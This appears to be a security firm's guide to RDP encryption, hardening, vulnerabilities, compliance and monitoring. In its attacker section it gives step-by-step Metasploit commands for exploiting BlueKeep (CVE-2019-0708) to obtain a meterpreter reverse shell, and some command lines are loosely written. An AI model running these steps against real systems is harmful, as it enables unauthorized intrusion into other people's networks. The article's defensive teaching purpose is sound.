Can RDP Be Encrypted? RDP Security Guide (updated)

A user can connect to a remote system, use all the tools and software installed on that system, control mouse movements and keystrokes, and basically operate the system as if they were physically sitting in front of the machine by sharing peripherals like a mouse and keyboard. 

When your organisation procures cyber security services to check the security controls in place, RDP is one of the most important elements whether its a build configuration review or methodology covering RDP security under penetration testing services. 

What is Remote Desktop Protocol (RDP)

Remote Desktop Protocol, or RDP, is a secure communication protocol developed by Microsoft that allows users to connect and control another computer. 

In a nutshell, this tool allows its users to remotely connect to any Windows machine on their local network or via the internet. It grants them access to that machine via a Graphical User Interface (GUI).

Microsoft says this about RDP:

The Microsoft Remote Desktop Protocol (RDP) provides remote display and input capabilities over network connections for Windows-based applications running on a server. RDP is designed to support different types of network topologies and multiple LAN protocols.

How does the Remote Desktop Protocol (RDP) work?

RDP works on a client-server model. The user originating the RDP (Local system) request must have an RDP client software running, and the remote system being accessed (Remote Desktop) must be running an RDP server software.

The remote Desktop Protocol (RDP) connection sequence above is the official protocol specification found on the Microsoft site.

The connection is made by either supplying the domain name or the IP address of the remote system in the built-in Microsoft Remote Desktop Connection Application. Once connected, the local system will be able to see the desktop of the requested machine.

Like all other services running on a system, RDP requires a dedicated network port, i.e., Port 3389/TCP, to transmit all its network traffic back and forth. The network traffic includes mouse movements, keystrokes, the desktop display, and other required data.

RDP also allows all the transferred data to be encrypted to keep the connection secure. Although a much-needed security feature, this does result in slight delays while operating the remote system.

RDP connections can also be established by using a Remote Desktop Gateway service.  

RDP Use Cases

RDP use cases include; when there is an issue with a remote system and the network or system administrators need to troubleshoot it. Other than this, RDP is used by employees working from home and who need to access their systems for their daily tasks. Or for personal use if someone needs access to their computer.

Some of the main features that a user can get while using RDP include:

• Smart card authentication
• Bandwidth reduction
• Multiple displays are supported
• Users can disconnect temporarily without logging off
• 128-bit rc4 encryption for mouse and keyboard data
• Shared audio capabilities between remote systems
• File sharing
• Local printers can be used
• Applications in the remote desktop session can access local ports
• Shared clipboard
• Applications on a remote desktop can run on the local computer
• Support for transport layer security (TLS)
• Support for faster connections
• Support for session shadowing

RDP’s Default Port And The Security Implications

By default, RDP runs on port 3389. 

Exposing RDP over the Internet means 3389/TCP or any other port where the service is running is open to connections. Bots and scripts keep scouring the Internet 24x7x365 for such services that could be attacked to identify successful logins. Once found, a threat actor may gain direct access to an internal network of a business. Therefore, the risk of exposing RDP or using RDP over the internet without security measures is too high and not worth the advantage of working without security measures.

Once a system is publicly accessible, malicious users will most definitely try to attack the server. Even if RDP is up-to-date, there is a chance that some other security vulnerability or flaw may be present in the server. If RDP itself is outdated and vulnerabilities like Bluekeep exist, then the entire company’s network will be compromised.

Is RDP Encrypted?

Yes, RDP is encrypted by default. 

Further, standards of the encryption settings and versions of RDP clients in use may strengthen or weaken the RDP encryption in use. 

By default, RDP supports secure encryption configuration; however, the highest levels may not be supported in some legacy clients. For this, a system administrator can manually select the level of encryption supported by the legacy client. There are four RDP encryption levels available:

1. FIPS-Compliant
2. High
3. Client Compatible
4. Low

What level of encryption does RDP use?

There are four levels of encryption available for RDP:

High

Using this setting, the data is encrypted using a 128-bit encryption key. This type of encryption may be incompatible with some systems that do not support 128-bit keys.

Client Compatible

Using this setting, the data is encrypted using the maximum key length supported by the RDP client and server.

Low

Using this setting, the data is encrypted using a 56-bit encryption key.

FIPS-Compliant

This setting can be used by companies that follow the Federal Information Processing Standard (FIPS). Using this setting, the data is encrypted using Microsoft’s cryptographic modules using the FIPS 140 encryption algorithm. This is the highest level of encryption that RDP can provide. FIPS compliance can be configured through the System cryptography under the Group Policy settings. (Under Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options.)

How to check RDP Encryption Level?

To check what encryption level is being set for a session, open a Terminal Service (TS) Manager and verify the status of the RDP connection where the level of encryption will be mentioned.

Even though RDP uses 128-bit RC4 encryption, it is possible to make the encryption even stronger by configuring RDP to use SSL (TLS) instead.

How to enable RDP Encryption?

To configure TLS encryption with RDP:

1. Open the Run application (Windows key + R) and type “mmc.exe”. Press Enter.

2. Open File > Add/Remove Snap-in.. Select “Global Policy Editor” and “Add” the selected snap-in/

3. Select “Local Computer” and click “Finish” > “OK”.

4. In the side navigation section go to: Local Computer Policy > Computer Configuration > Administrative Templates > Windows Components > Remote Desktop Services > Remote Desktop Session Hosts > Security. Select “Require use of a specific security layer for remote (RDP) connections” and edit this policy.

5. Select the Enabled radio button and choose SSL from the drop-down menu. This will ensure that RDP uses SSL encryption instead of native RC4 encryption.

Common RDP Vulnerabilities and Attack Vectors

RDP vulnerabilities and associated attack vectors are explained in the below attacks and techniques:

• BlueKeep and Related Vulnerabilities exploit flaws in the Remote Desktop Services (RDS) protocol. These vulnerabilities (CVE-2019-0708) allow attackers to execute code remotely without any interaction from the user.
• Man-in-the-Middle (MitM) attacks intercept communication between the RDP client and server. This lets attackers steal credentials, inject malicious code, and eavesdrop on sensitive data.
• Brute force and credential stuffing are common tactics. Attackers use automated tools to guess usernames and passwords. Credential stuffing reuses credentials stolen from other breaches to try and log in.
• Session hijacking involves stealing an active RDP session. This gives attackers unauthorised access to the target system and its resources.
• Clear-text credential exposure is a significant risk. If RDP connections aren’t properly secured (e.g., using TLS/SSL), credentials can be transmitted in plain text, making them easy to intercept.
• Encryption downgrade attacks trick the RDP client into using weaker encryption protocols. This makes the connection more vulnerable to eavesdropping and attacks.

Recent Attacks

• The Lazarus Group (a North Korean-linked threat actor) has been actively exploiting RDP vulnerabilities, including BlueKeep. They’re using these vulnerabilities to deploy ransomware and conduct espionage operations.

RDP & VPN: How does that work?

Since exposing internal servers to the public internet is a high risk, a more secure route will be to set up a Virtual Private Network (VPN). The company would not have to expose any of its assets to the internet or worry about external malicious users attacking its assets.

Users would connect to the VPN, and their machine would act as if accessing a local system in the company’s internal networks. This is after VPN creates a secure tunnel between your system and the company’s endpoint. The users can then RDP to the required system using their private IP addresses as they normally do while physically present inside the office.

How to harden RDP security?

While using RDP, it is important to follow best practice guidelines and implement a defence in-depth approach to achieve a maximum level of security. Some of the best practices are described below:

1. Update RDP to patch any discovered vulnerabilities.
2. Enable two-factor authentication when authenticating to RDP servers.
3. Ensure strong password complexity rules are being implemented.
4. Enable an account lockout policy to protect against brute force attacks.
5. Change the RDP port from default port 3389 to some other custom port number.
6. Do not allow the server to accept RDP connections from any untrusted host, instead implement a safe listing mechanism that defines a list of trusted and allowed connections from known IP addresses.
7. Implement the Zero Trust Policy and the Principle of Least Privilege by granting remote access to only those who legitimately need it.
8. Do not expose internal servers to the public internet to allow RDP connections over the internet.
9. Set up a VPN or use Remote Desktop Gateway for creating a secure tunnel to access the internal servers.
10. Scan the corporate network at regular intervals to find any RDP instances exposed on the internet.
11. Enable Network Level Authentication (NLA).
12. Use Single-Sign-On mechanism (SSO).
13. Set maximum native encryption settings for RDP. To ensure that RDP always uses the highest level of encryption, go to the group policy editor and configure the encryption level to High. Computer Configuration > Administrative Templates > Windows Components > Remote Desktop Services > Remote Desktop Session Host > Security >
    1. Set client connection encryption level > Enabled > High Level.
    2. Require use of specific security layer for remote (RDP) connections -> Enabled, security layer settings should display SSL (TLS 1.0) 
    3. Require user authentication for remote connections by using Network Level Authentication -> Enabled.

Make sure the SSL protocols are disabled and TLS is preferred version with specific TLS 1.2 and above versions in use. For RDP cipher suites and managing TLS, read this Microsoft guidance on Manage Transport Layer Security (TLS). 

RDP & Compliance Standards

Many compliance standards mandate the data protection while in transit or during remote access sessions. Here are the most popular RDP security compliance areas:

• HIPAA (Health Insurance Portability and Accountability Act): Healthcare organisations must ensure the confidentiality, integrity, and availability of patient data. This includes strict controls on remote access, such as strong authentication, encryption, and access controls.
• PCI DSS (Payment Card Industry Data Security Standard): Organisations handling cardholder data must comply with PCI DSS, which mandates strong access controls, including for remote access methods like RDP.
• SOX (Sarbanes-Oxley Act): This act requires companies to maintain accurate financial records. Secure remote access, including proper logging and auditing of RDP sessions, is crucial for SOX compliance.
• GDPR (General Data Protection Regulation): GDPR emphasizes the importance of data protection and privacy. Organizations must ensure that any processing of personal data, including remote access to systems containing such data, complies with GDPR requirements.

Alternatives to RDP

VPN

VPNs create a secure, encrypted tunnel across the internet, letting you access your office network remotely as if you were there in person. While not a direct substitute for RDP, VPNs provide a solid security base for remote access and can be used alongside other remote desktop solutions.

Chrome Remote Desktop,

It is a Google service, uses the Chrome browser to enable remote access to your computer. It’s a breeze to set up and use, making it a convenient choice for personal and light business needs. However, its functionality might be more limited compared to more robust solutions like RDP.

FreeRDP

This is an open-source client that implements the RDP protocol. It supports various operating systems and can be a great option if you’re looking for a free and open-source alternative to proprietary solutions. However, setting it up and using it effectively might require some technical know-how.

TeamViewer

It is a popular commercial solution for remote access and support. It boasts a user-friendly interface, strong security measures, and a wide range of features, including file transfers, remote printing, and session recording. However, its free version has limitations, and the paid version can be quite expensive for some users.

XRDP

Xrdp is an open-source implementation of Microsoft RDP commonly used on non-Microsoft operating systems. 

Is xrdp encrypted?

Yes, XRDP is encrypted by default. It uses the TLS protocol to encrypt all data transmissions between the client and server. This includes the authentication handshake, the user session, and the clipboard.

The TLS protocol uses strong encryption algorithms to protect data from unauthorized access. The default encryption level for XRDP is 128 bits, which is considered to be very secure.

However, it is important to note that the security of XRDP depends on the security of the underlying network. If the network is not secure, then an attacker could potentially intercept the encrypted data and decrypt it.

To improve the security of XRDP, it is recommended to use a VPN. A VPN creates a secure tunnel between the client and server, which makes it much more difficult for an attacker to intercept the data.

Overall, XRDP is a secure remote desktop protocol. However, it is important to take steps to further improve its security, such as using a VPN.

Here are some additional security tips for using XRDP:

• Use a strong password for the XRDP server.
• Enable two-factor authentication for the XRDP server.
• Keep the XRDP server up to date with the latest security patches.
• Use a firewall to restrict access to the XRDP server.

How to monitor RDP security?

Monitoring RDP is crucial to identify and mitigate potential threats. Here are some key strategies:

• Implement robust logging: Capture detailed logs of all RDP sessions, including user activity, connection source, duration, and any errors. This provides valuable insights into potential security incidents.
• Utilise Security Information and Event Management (SIEM) systems: SIEM tools can analyse log data from various sources, including RDP logs, to detect suspicious activity such as brute-force attacks, unusual login times, or data exfiltration attempts.
• Conduct regular security audits: Regularly review RDP configurations, access controls, and security policies to identify and address any vulnerabilities.
• Implement intrusion detection systems (IDS) or intrusion prevention systems (IPS): These systems can monitor network traffic for malicious activity, including attempts to exploit RDP vulnerabilities.Utilise network traffic analysis tools: Analyse network traffic to identify any suspicious patterns or anomalies related to RDP connections.
• Regularly review user access rights: Ensure that users only have the necessary permissions to perform their job functions, adhering to the principle of least privilege.

How attackers exploit the Remote Desktop Protocol?

As mentioned above, RDP has multiple vulnerabilities, the most popular of which is the Bluekeep vulnerability.

Exploiting Bluekeep has become very simple, and anyone with just basic knowledge of how computers work can exploit this vulnerability as exploit codes are available publicly on the internet. One of the most common hacking frameworks, Metasploit has the exploit code in it; all a person needs is the IP addresses of the target system and an updated KALI Linux system to hack the machine.

For example, it is quite an easy task to exploit Bluekeep using Metasploit Framework:

Open Metasploit console:
>> msfconsole
Select the Bluekeep exploit code module.
>> use cve_2019_0708_bluekeep_rce
Set the RHOST to the IP address of the target system.
>> RHOST 192.168.31.75
Choose the OS of the target system. This can be done by viewing the available OS options by using the “show targets” option and then selecting the required target OS.
>> show targets>> set TARGET 3
Set the LHOST to the IP address of your own machine.
>> set LHOST 192.168.31.78
Type “exploit” to execute the exploit code. This will give you a meterpreter shell.

Can you use RDP over the internet?

It is possible to access remote machines via RDP coming from the public internet. If the target server is exposed directly to the internet, i.e., the server has a public IP address through which it is accessible, and the RDP port is also allowed. Anyone can connect to the target server via RDP using legitimate credentials.

This, however, does introduce many more security risks as the server is now exposed and can become a victim to various potential attacks over the internet.

Conclusion

In any organisation, it is efficient to have remote desktop access to systems for either day-to-day tasks, system maintenance, or troubleshooting. RDP has become an essential tool, especially for the system administrator. If implemented correctly and considering all best practices, RDP can become very effective.

Unfortunately, if any mistake or negligence is made, RDP can become a doorway for attackers to launch a full-scale attack and compromise the network, such as ransomware.

As a best practices recommendation, most organisations opt for Infrastructure security assessments and periodically build reviews and related checks. It helps them validate their security controls and identify blind spots in their security practices.